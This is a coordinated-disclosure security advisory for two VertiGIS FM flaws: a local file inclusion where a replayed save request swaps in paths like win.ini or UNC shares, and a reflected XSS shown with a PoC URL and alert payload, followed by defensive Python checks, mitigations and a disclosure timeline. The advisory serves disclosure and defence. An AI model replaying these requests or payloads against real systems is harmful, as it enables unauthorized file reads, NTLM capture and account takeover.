Security Advisory for VertiGIS FM: Local File Inclusion in the File Upload/Download Process and Reflected Cross-Site Scripting (XSS)

Apr 1, 2026 by Benjamin Faller, David Wischnjak, Andreas Pfefferle

During a recent engagement, Redguard’s security team conducted a penetration test against the GIS infrastructure of a customer. During this penetration test, an arbitrary file read due to a local file inclusion vulnerability was discovered in the multi-step file upload/download process of the VertiGIS FM application, a GIS solution for facility and infrastructure management developed by the vendor VertiGIS Ltd. The local file inclusion flaw, now assigned CVE-2026-0522, enables an authenticated attacker to read arbitrary files from the server. This vulnerability was rated with a high-severity CVSS base score of 7.4. Later, during the validation of the fix implemented by the vendor, an additional reflected cross-site scripting (XSS) vulnerability was identified in the dashboard search functionality. The reflected XSS vulnerability, assigned CVE-2026-3877, enables an attacker to craft a malicious URL that executes JavaScript in the context of any authenticated victim who visits it. This vulnerability was rated with a high-severity CVSS base score of 7.3. Concluding the coordinated disclosure process, the vendor has released patches that address both issues.

Security Advisory for CVE-2026-0522

A local file inclusion vulnerability in the upload/download flow of the VertiGIS FM application allows authenticated attackers to read arbitrary files from the server by manipulating a file’s path during its upload. When the file is subsequently downloaded, the file at the attacker-controlled path is returned instead of the uploaded one. Because the application is built on ASP.NET, this could lead to remote code execution if the web.config file is obtained. Furthermore, the application resolves UNC paths, so an attacker can make the application process authenticate to an attacker-controlled host, which may enable NTLM-relaying attacks.

  • Vulnerability Type: Arbitrary file read due to a local file inclusion in the upload/download functionality
  • Attack Vector: Authenticated user with access to the upload/download functionality
  • Affected Product: VertiGIS FM
  • CVSS Score: 7.4 (High - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P)
  • CVE: CVE-2026-0522

Proof of Concept (PoC)

The upload process was initiated by uploading a file through the document upload function of the web user interface.


A file upload triggered the following request to store the actual file contents on the server:

POST /bfusr/invoke/GeoMan.Common.Web.UserControls.GeoManDBDocumentsFeatureControl,GeoMan.Common.Web/AjaxDocUpload?qqfile=smudge.jpg&_DATA=%5B%7B%22uploadContext%22%3A%221b06d797-4f37-4627-8e16-59a86bb227b0%22%7D%5D&controlmode=undefined HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: image/jpeg

[FILE CONTENT]

The server then returned the file path for the temporary file on the server’s file system:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 118

{"success":true,"tempPath":"C:\\Windows\\TEMP\\GeoManUpload\\VertiGISFM_worker\\bme5rozq.r5d.jpg","fileName":"smudge"}

During the file upload, multiple requests were exchanged between the client and the server. However, only the final request, in which the uploaded file is linked to an internal ID, is relevant for this vulnerability. This request was triggered by clicking Save in the user interface.


Shown below is the corresponding request triggered by the client when the button was pressed:

POST //GeoManEdit.aspx?WindowMode=Frame&OPath=78%40100021&WorkflowEntity=dotNetBF.Modules.Org.Person&WorkflowType=Add&WorkflowName=AddDocuments&RedirectUrl=[REDACTED] HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: application/x-www-form-urlencoded

Cmd=EDIT&__EVENTTARGET=toolbar&__EVENTARGUMENT=APPLY&__DISPLAYSTATI=&__VIEWSTATE=[...]&__VIEWSTATEGENERATOR=[...]&moduleName=&__SCROLLPOS=0&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl05%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl01%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl01%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24changes=ADD%0D%0AA%401003A5%0D%0A03.09.2025%0D%0A0%0D%0Asmudge%0D%0Asmudge.jpg%0D%0AC%3A%5CWindows%5CTEMP%5CGeoManUpload%5CVertiGISFM_worker%5Cbme5rozq.r5d.jpg%0D%0A0&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24removed=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24_ctlType%24txt=Sonstiges+Dokument&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24_ctlType%24val=A%401003A5&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl03%24_ctlDocDate%24val=26.08.2025&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl05%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl05%24_ctlName=rce&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddIndexCollection=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddDeletedIndexCollection=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddState=1&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24CurrentColumnFilters=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24ParentStates=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24State=1&file=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl21%24txt=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl21%24val=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl24%24txt=100%25&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl24%24val=1&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl29%24txt=Wie+Kamera&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl29%24val=none&EditControl%24frmGui%24form%24ctl03%24ctl00=0&EditControl%24frmGui%24form%24ctl03%24ctl02%24wasVisible=True&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddIndexCollection=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddDeletedIndexCollection=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddState=0&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24CurrentColumnFilters=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24ParentStates=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24State=0

The relevant parameter of the request body, URL-decoded for readability, carried the following CRLF-separated record. Its seventh field is the temporary path returned by the upload response:

EditControl$frmGui$form$ctl01$when0$ctl00$ctl01$_ctlDocuments$changes=ADD
A@1003A5
03.09.2025
0
smudge
smudge.jpg
C:\Windows\TEMP\GeoManUpload\VertiGISFM_worker\bme5rozq.r5d.jpg
0

This request could be replayed with an arbitrary file path such as C:\Windows\win.ini. When the file was subsequently downloaded through the web user interface, the file contents showed that the win.ini file was returned instead of the originally uploaded file.

Impact

The file upload process can therefore be abused to read arbitrary files from the server, provided the application process has the necessary access rights. The specified file path is not limited to local files on the web server: UNC paths are accepted as well. Attackers exploiting this vulnerability are thus able to access local files as well as files on network shares, as long as the file paths are known and the process has access to them. When the UNC path points to an attacker-controlled host, the application process authenticates to that host with its own account; an attacker in a suitable network position can capture the resulting NTLM authentication or relay it to other services.

For ASP.NET applications, the web.config file contains the cryptographic secrets (the validationKey and decryptionKey of the machineKey element) used to sign and encrypt the ViewState. If those secrets are known, it is often possible to generate malicious ViewState payloads which, when received by the server, lead to remote code execution through deserialization of the ViewState objects. Due to time constraints in this penetration test, this could not be technically verified, but the security testers assume it to be feasible.

Enabled stack traces or verbose error messages can additionally support such an attack, since local file inclusion requires prior knowledge of server-side file paths.
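The following Python snippet is an added example written for this advisory; it is not VertiGIS FM code and does not reproduce the vendor's fix. It parses the `_ctlDocuments$changes` record from a save request like the one shown above (using a shortened, constructed form body that keeps only that record), applies the check the server was missing (the temporary path must be an absolute local path strictly inside the upload directory, with UNC paths and traversal rejected, which also closes the NTLM coercion vector described above), and shows the more robust alternative of never accepting a path from the client at all but handing out an opaque upload token instead. The upload directory is the one seen in the upload response; the field names of the record, the `audit_save_request` helper and the `UploadRegistry` class are assumptions.

```python
import ntpath
import secrets
import urllib.parse
from typing import Optional

# Temporary upload directory as returned in the advisory's AjaxDocUpload response.
UPLOAD_DIR = r"C:\Windows\TEMP\GeoManUpload\VertiGISFM_worker"

# Constructed, shortened form body: only the document "changes" record of the
# advisory's save request is kept; ViewState and layout fields are omitted.
SAMPLE_BODY = (
    "Cmd=EDIT&__EVENTTARGET=toolbar&__EVENTARGUMENT=APPLY"
    "&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24changes="
    "ADD%0D%0AA%401003A5%0D%0A03.09.2025%0D%0A0%0D%0Asmudge%0D%0Asmudge.jpg%0D%0A"
    "C%3A%5CWindows%5CTEMP%5CGeoManUpload%5CVertiGISFM_worker%5Cbme5rozq.r5d.jpg%0D%0A0"
    "&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24removed="
)

# Field order of the CRLF-separated record as shown decoded in the advisory. The two
# numeric fields are not explained there, so their names here are placeholders.
CHANGES_FIELDS = ("action", "doc_type", "date", "field4",
                  "name", "file_name", "temp_path", "field8")


def parse_changes(body: str) -> dict:
    """Return the document 'changes' record of a GeoManEdit.aspx form body as a dict."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    key = next(k for k in fields if k.endswith("$_ctlDocuments$changes"))
    parts = fields[key][0].split("\r\n")
    if len(parts) != len(CHANGES_FIELDS):
        raise ValueError(f"unexpected changes record with {len(parts)} fields")
    return dict(zip(CHANGES_FIELDS, parts))


def is_trusted_temp_path(path: str, base_dir: str = UPLOAD_DIR) -> bool:
    """True only if `path` is an absolute local file strictly inside `base_dir`.

    ntpath applies Windows path rules regardless of the OS this runs on.
    """
    norm = ntpath.normpath(path)          # collapses "..", "." and "/" separators
    if norm.startswith("\\\\"):           # UNC (\\host\share) and \\?\ device paths
        return False
    if not ntpath.isabs(norm):            # relative paths resolve against the process cwd
        return False
    base = ntpath.normpath(base_dir).rstrip("\\") + "\\"
    return norm.lower().startswith(base.lower())   # NTFS paths are case-insensitive


def audit_save_request(body: str) -> list:
    """Findings for one save request; an empty list means the path is acceptable."""
    record = parse_changes(body)
    findings = []
    if not is_trusted_temp_path(record["temp_path"]):
        findings.append("temp_path outside upload directory: " + record["temp_path"])
    return findings


class UploadRegistry:
    """Server-side map from an opaque token to the real temporary path.

    The client only sees and returns the token, so the path can no longer be
    swapped between the upload request and the save request.
    """

    def __init__(self):
        self._paths = {}

    def register(self, temp_path: str) -> str:
        token = secrets.token_urlsafe(32)
        self._paths[token] = temp_path
        return token

    def resolve(self, token: str) -> Optional[str]:
        return self._paths.pop(token, None)   # one-shot: a token cannot be replayed


if __name__ == "__main__":
    print(audit_save_request(SAMPLE_BODY))   # []
    forged = SAMPLE_BODY.replace("bme5rozq.r5d.jpg", "..%5C..%5C..%5Cwin.ini")
    print(audit_save_request(forged))        # one finding for the traversal path
```

On a real server the prefix check should be made on the path as resolved by the file system (for instance Path.GetFullPath in .NET) rather than on the string alone, since 8.3 short names, junctions and symbolic links can make two different strings refer to the same file. The token-based registry sidesteps the problem entirely because the client never supplies a path; the `uploadContext` GUID already present in the upload request is the natural handle for such a lookup.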

Security Advisory for CVE-2026-3877

A reflected cross-site scripting (XSS) vulnerability in the dashboard search functionality of the VertiGIS FM solution allows attackers to craft a malicious URL that, if visited by an authenticated victim, executes arbitrary JavaScript in the victim’s context. Such a URL could be delivered in various ways, for instance by sending a link or by luring victims to an attacker-controlled page.

  • Vulnerability Type: Reflected cross-site scripting (XSS) via a specially-crafted URL
  • Attack Vector: A user crafts a malicious URL that is subsequently opened by a victim
  • Affected Product: VertiGIS FM
  • CVSS Score: 7.3 (HIGH - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)
  • CVE: CVE-2026-3877

Proof of Concept (PoC)

VertiGIS FM provides the /demo/1/fm/DashboardSearch.aspx endpoint. Parts of the URL are reflected in an HTML script tag without proper output encoding, which allows attacker-controlled JavaScript to be injected. The following URL was used to demonstrate this flaw:

https://fm.vertigis.com/demo/1/fm/DashboardSearch.aspx?type=GeoMan.Devices.ObjOrderSearchList,GeoMan.Common.Core&ModuleInfo=GeoMan.Device67213#'}};alert(window.location);/*

When this URL is visited by an authenticated user, the alert is shown in the user’s web browser.


Impact

Exploiting this vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser and perform unauthorized actions on their behalf. If the compromised account holds the necessary privileges, the attacker can also view and edit stored data.

It should be noted that the XSS is only exploitable if the victim is already authenticated within the application.
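An added example, not code from the original page or from VertiGIS FM, showing in Python the generic vulnerable pattern behind this class of bug next to its hardened form. It assumes a page that embeds a request-controlled value (called `module_info` here) into an inline script as a nested object literal; the variable names and the two templates are constructed, and which part of the DashboardSearch.aspx URL is reflected and how is not detailed on this page. The payload from the PoC URL above is used as input.

```python
import html
import json

# Payload taken from the advisory's PoC URL.
PAYLOAD = "'}};alert(window.location);/*"

# Constructed inline-script templates; the variable names are assumptions and are not
# VertiGIS FM's markup. The nested object mirrors the "'}}" prefix of the payload.
UNSAFE_TEMPLATE = "<script>var dashboard = {{search: {{module: '{value}'}}}};</script>"
SAFE_TEMPLATE = "<script>var dashboard = {{search: {{module: {literal}}}}};</script>"


def js_string_literal(value: str) -> str:
    """Encode `value` as a JS string literal that cannot leave its string context.

    json.dumps escapes quotes, backslashes, control characters and (with the default
    ensure_ascii=True) everything non-ASCII, including U+2028/U+2029. The additional
    replacements cover characters that are legal in JSON but meaningful to the HTML
    parser inside a <script> block ("</script>", "<!--") or to a single-quoted context.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"), ("'", "\\u0027")):
        literal = literal.replace(ch, esc)
    return literal


def render_unsafe(module_info: str) -> str:
    """Vulnerable pattern: the request value is concatenated straight into script code."""
    return UNSAFE_TEMPLATE.format(value=module_info)


def render_safe(module_info: str) -> str:
    """Hardened pattern: the value only ever appears as an encoded string literal."""
    return SAFE_TEMPLATE.format(literal=js_string_literal(module_info))


def render_data_attribute(module_info: str) -> str:
    """Alternative: keep the value out of script context and read it via dataset.module."""
    return '<div id="dashboard" data-module="%s"></div>' % html.escape(module_info, quote=True)


if __name__ == "__main__":
    value = "GeoMan.Device67213" + PAYLOAD
    print(render_unsafe(value))   # the quote closes the literal and alert() becomes code
    print(render_safe(value))     # the quote becomes \u0027 and the payload stays data
```

The server-side equivalent in ASP.NET is to pass every value that ends up inside a script block through HttpUtility.JavaScriptStringEncode (or to serialize it with a JSON encoder that escapes `<`, `>` and `&`) rather than concatenating it into the page; a Content Security Policy with nonces for inline scripts limits the blast radius if an encoding is missed.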

Affected versions

The local file inclusion vulnerability was identified in VertiGIS FM in version 10.5.00119 (0d29d428), while the XSS was found in a test environment. According to the vendor, versions prior to 10.11.363 are vulnerable to the local file inclusion while versions prior to 10.13.403 are vulnerable to the reflected XSS.

Suggested Mitigations and Countermeasures

The vendor has addressed these vulnerabilities in version 10.11.363 (local file inclusion) and 10.13.403 (reflected XSS); Redguard’s security testers have confirmed both fixes as successful mitigations. It is therefore recommended to upgrade to version 10.13.403 or later. As an additional defense-in-depth measure, Redguard recommends restricting the permissions of the application process and its access to the file system, as well as network restrictions that make the application reachable only within the intended scope. In addition, firewall rules can be used to allow only strictly necessary connections to other servers; in particular, blocking outbound SMB from the web server prevents the application from authenticating to arbitrary hosts via UNC paths.

Credits

  • Benjamin Faller, Redguard AG
  • David Wischnjak, Redguard AG
  • Andreas Pfefferle, Redguard AG

Timeline

The following timeline details all the steps taken in the coordinated vulnerability disclosure process. The customer refers to the company that tasked Redguard with a penetration test of VertiGIS FM and the vendor refers to the VertiGIS team:

  • 2025-09-19: Redguard reported the local file inclusion vulnerability to the customer.
  • 2025-09-26: Customer agreed to perform the CVD.
  • 2025-11-13: Redguard notified the vendor of the vulnerability and CVD.
  • 2025-11-14: Redguard shared the technical details with the vendor.
  • 2025-11-21: Vendor asked Redguard for a meeting to discuss the public disclosure of the vulnerability.
  • 2025-11-27: Alignment meeting between Redguard and the vendor. Redguard answered the vendor’s questions on CVD procedures, confirmed advisory publication, and committed to retesting the fix upon deployment.
  • 2025-12-03: Access to a deployment for the retest was granted to Redguard.
  • 2025-12-16: Redguard shared the retest results, confirmed the initial fix was successful, but reported a temporary path was still exposed, and contacted NCSC for a CVE-ID. Redguard also shared technical details about a new, potentially exploitable reflected XSS vulnerability to the vendor. Redguard offered to verify practical exploitability of the XSS vulnerability if access to the test environment can be reactivated.
  • 2025-12-21 to 2026-01-26: Communication regarding test environment access logistics.
  • 2026-01-15: Redguard followed up on the current patch release status and informed the vendor that CVE-2026-0522 was reserved for the file inclusion vulnerability.
  • 2026-01-26: Vendor confirmed that hosted customers were updated and all others were informed via the support portal to patch their systems.
  • 2026-01-30: Redguard asked for the vulnerable and patched version numbers.
  • 2026-02-01: Vendor communicated the patched version number for the local file inclusion vulnerability.
  • 2026-02-03 to 2026-02-04: Redguard was able to verify and confirm to the vendor that the XSS is exploitable and that a CVE would be assigned. Redguard also asked for information whether this vulnerability was already patched based on the information provided in December and asked whether the disclosure of both vulnerabilities should continue separately.
  • 2026-02-16: Redguard asked for a status update.
  • 2026-02-27: Redguard asked for a status update and set a new deadline for publication should no further feedback be received.
  • 2026-03-09: Vendor confirmed the fix for CVE-2026-0522 was complete and requested technical details for the XSS exploitation.
  • 2026-03-10: Redguard provided the updated draft advisory including the XSS details. CVE-2026-3877 was reserved by the NCSC for the XSS vulnerability. The vendor announced the planned release date of 2026-03-18.
  • 2026-03-12: Redguard set the final publication date to 2026-04-01.
  • 2026-03-20: Vendor provided the patched and released version number for the XSS.
  • 2026-03-25: Redguard shared the final vulnerability details with the NCSC.
  • 2026-03-26: Redguard informed the vendor that CVE-2026-3877 was reserved and that everything was set for publication.
  • 2026-04-01: Publication of this advisory.

Disclaimer

This advisory is not an exhaustive list of all potential security issues for the mentioned software. Other vulnerabilities may exist. The information provided is believed to be accurate at the time of publishing. Use of this information is at your own risk. Neither the author nor the publisher accepts any liability for any loss or damage arising from the use of, or reliance on, this information.
